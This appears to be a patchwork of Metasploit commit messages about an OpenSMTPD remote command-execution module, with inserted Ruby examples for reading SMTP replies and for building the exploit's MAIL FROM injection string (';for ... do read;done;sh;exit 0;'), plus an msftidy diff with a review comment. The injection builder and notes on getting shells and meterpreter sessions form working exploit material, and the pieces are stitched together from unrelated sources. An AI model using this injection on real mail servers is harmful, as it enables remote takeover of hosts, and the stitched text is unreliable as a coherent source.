Changes in #16153 adjusted modules that were not utilizing
`Exploit::Remote::SMTPDeliver` in error; restore calls to `raw_send_recv`,
which is no longer shadowed in `SMTPDeliver`.
When dealing with SMTP servers the communication needs to follow
a known protocol. To ensure the socket is in the correct state
after a send and receive, it needs to be read until a line is returned
that consists of a response code followed by a `space`, additional data and `\r\n`,
or of the response code immediately followed by `\r\n`.
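The reading rule described above, as an added example in Ruby that is not Metasploit's own `raw_send_recv` implementation: a reply line whose three-digit code is followed by a hyphen (`250-PIPELINING`) is a continuation, and the reply is only complete once a line with code plus space, or a bare code, arrives. The reader consumes the whole multi-line reply in one call so nothing is left on the socket for the next send; the transcript and `FakeSocket` below are constructed for offline use.

```ruby
require 'stringio'

# Read one complete SMTP reply from an IO that responds to #gets.
# Continuation lines are "XYZ-text\r\n"; the reply ends with "XYZ text\r\n"
# or a bare "XYZ\r\n". Returns [code, text_lines]; raises if the stream
# ends mid-reply or a line does not look like an SMTP reply line.
def read_smtp_reply(io)
  code = nil
  lines = []
  loop do
    raw = io.gets("\r\n")
    raise EOFError, 'connection closed before the reply was complete' if raw.nil?
    line = raw.chomp("\r\n")
    m = line.match(/\A(\d{3})(?:([ -])(.*))?\z/)
    raise ArgumentError, "malformed SMTP reply line: #{line.inspect}" unless m
    code ||= m[1]
    raise ArgumentError, "reply code changed from #{code} to #{m[1]}" if m[1] != code
    lines << (m[3] || '')
    break unless m[2] == '-' # a space, or no separator at all, ends the reply
  end
  [code.to_i, lines]
end

# Send one command and read exactly one reply, so every send is paired
# with a complete receive. `sock` only needs #write and #gets (a TCPSocket
# in practice; the FakeSocket below for offline use).
def smtp_send_recv(sock, command)
  sock.write("#{command}\r\n")
  read_smtp_reply(sock)
end

# Constructed stand-in for a socket: replies come from a canned transcript,
# and everything the client writes is recorded in #sent.
class FakeSocket
  attr_reader :sent

  def initialize(replies)
    @in = StringIO.new(replies)
    @sent = +''
  end

  def write(str)
    @sent << str
  end

  def gets(sep)
    @in.gets(sep)
  end
end

# Constructed server transcript: a banner, a multi-line EHLO reply, and a
# bare code with no text after it.
SAMPLE_REPLIES = [
  "220 mail.example.test ESMTP ready\r\n",
  "250-mail.example.test\r\n",
  "250-PIPELINING\r\n",
  "250 SIZE 10240000\r\n",
  "354\r\n",
].join.freeze

if __FILE__ == $PROGRAM_NAME
  io = StringIO.new(SAMPLE_REPLIES.dup)
  p read_smtp_reply(io) # banner
  p read_smtp_reply(io) # the three EHLO lines come back as one reply
  p read_smtp_reply(io) # bare code, empty text
end
```

Used against a real server, `smtp_send_recv(sock, 'EHLO host')` returns only after the final `250 ` line, which is the state the commit message wants the socket left in.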
For whatever reason, `;for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;` causes an issue with the payload triggering.
Editing `do read` to `do read r`, as taken from the PoC script at https://www.exploit-db.com/exploits/48051, causes the `MAIL_FROM` field to exceed 64 characters.
However, this seems to make no difference to the payload, so I commented out the length check.
Reliably working on OpenSMTPd 6.6.0 on an Ubuntu 20.04 host.
Also updates the check to be more precise. I had originally copied the
check method from the Morris worm Sendmail exploit:
220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST
Note that there was no "ESMTP" string in 1985's Sendmail.
The original Qualys exploit uses an inline-shell for loop to read
and thereby consume lines from the input stream preceding the
intended script for execution in the body section. Payloads which
do not contain bad characters (encoded or coincidentally simple)
can be placed directly into the FROM field and executed in place
of the original for loop filter.
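A model of that line-consuming trick, added here as an example and not the module's or Qualys's code: one `read` per loop iteration eats one line of what the shell receives on stdin, so the number of tokens in the iteration list must equal the number of lines that precede the script, and the whole sender still has to fit the 64-character local-part limit mentioned above. The `build_sender`, `sender_fits?` and `simulate_shell` helpers, the `skip` counts and the sample message are all constructed for this example; the real line count depends on what the server prepends to the message, which this model does not know.

```ruby
# Assumed local-part limit, taken from the 64-character note above.
MAX_LOCALPART = 64

# Build the for-loop sender. `skip` is the number of lines the loop must
# consume; the tokens are arbitrary single characters kept short on purpose.
# `read_var` reproduces the `do read r` variant from the PoC script.
def build_sender(loop_var, skip, read_var: nil)
  iter = (0...skip).map { |i| i.to_s(36) }.join(' ')
  read = read_var ? "read #{read_var}" : 'read'
  ";for #{loop_var} in #{iter};do #{read};done;sh;exit 0;"
end

def sender_fits?(sender)
  sender.length <= MAX_LOCALPART
end

# Simulate /bin/sh running the sender with the message on stdin: each
# iteration token consumes one line, and whatever remains is what `sh`
# would execute. Returns those remaining lines rather than running them.
def simulate_shell(sender, message)
  m = sender.match(/\A;for \w+ in ([^;]+);do read(?: \w+)?;done;sh;exit 0;\z/)
  raise ArgumentError, 'sender is not the for-loop form' unless m
  skip = m[1].split.size
  message.split("\n").drop(skip)
end

# Constructed message as the shell would see it: six header/separator lines
# followed by a two-line script.
SAMPLE_MESSAGE = [
  'Received: from client (localhost [127.0.0.1])',
  "\tby mail.example.test (OpenSMTPD) with ESMTP id 00000000",
  'From: <sender@example.test>',
  'To: <root@example.test>',
  'Subject: test',
  '',
  'echo hello',
  'uname -a',
].join("\n").freeze

if __FILE__ == $PROGRAM_NAME
  sender = build_sender('a', 6)
  puts sender
  p sender_fits?(sender)
  p simulate_shell(sender, SAMPLE_MESSAGE) # the script lines only
  p simulate_shell(build_sender('a', 5), SAMPLE_MESSAGE) # off by one: blank line leaks in
  p sender_fits?(build_sender('a', 16, read_var: 'r')) # too long for the local part
end
```

The off-by-one case is why the token count matters: one token too few hands the shell a header or blank line first, one too many swallows the first line of the script.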
Using method from
https://www.openwall.com/lists/oss-security/2020/01/28/3
Attempted several other line readers via awk, while, for. Tried
without pipes or `>` in the strings. It appears other characters
are also illegal (conditional brackets likely culprits).
Initial testing on wide-open-configured opensmtpd on OpenBSD 6.6
libvirt Vagrant image produces shells, python meterpreter sessions,
and executes generic commands.
Basic msftidy fixer:
diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
# Check disclosure date format
if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
d = $1 #Captured date
+ File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+ fixed('Probably updated traditional DisclosureDate to ISO 8601')
# Flag if overall format is wrong
if d =~ /^... (?:\d{1,2},? )?\d{4}$/
# Flag if month format is wrong
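Review bot: the added `File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))` runs unconditionally, before the format checks that follow it, so msftidy now rewrites every module file on every run even when `d` is already ISO 8601, and `Date.parse(d)` raises `ArgumentError` on a date it cannot parse, which aborts the whole tidy pass instead of reaching the `if d =~ /^... (?:\d{1,2},? )?\d{4}$/` flag that exists for exactly that case. Suggest computing the ISO form first, skipping the write when it equals `d` or parsing fails, and leaving the original checks to report the problem, for example `iso = Date.parse(d).to_s rescue nil` followed by `File.write(...) if iso && iso != d`. Two smaller points: `@source.sub(d, ...)` replaces the first occurrence of the date text anywhere in the source, not specifically the `DisclosureDate` value, and after the write `@source` and `d` still hold the old text, so the later checks flag a date that was just fixed on disk; also confirm `require 'date'` is present in this file, since `Date` is not loaded by default.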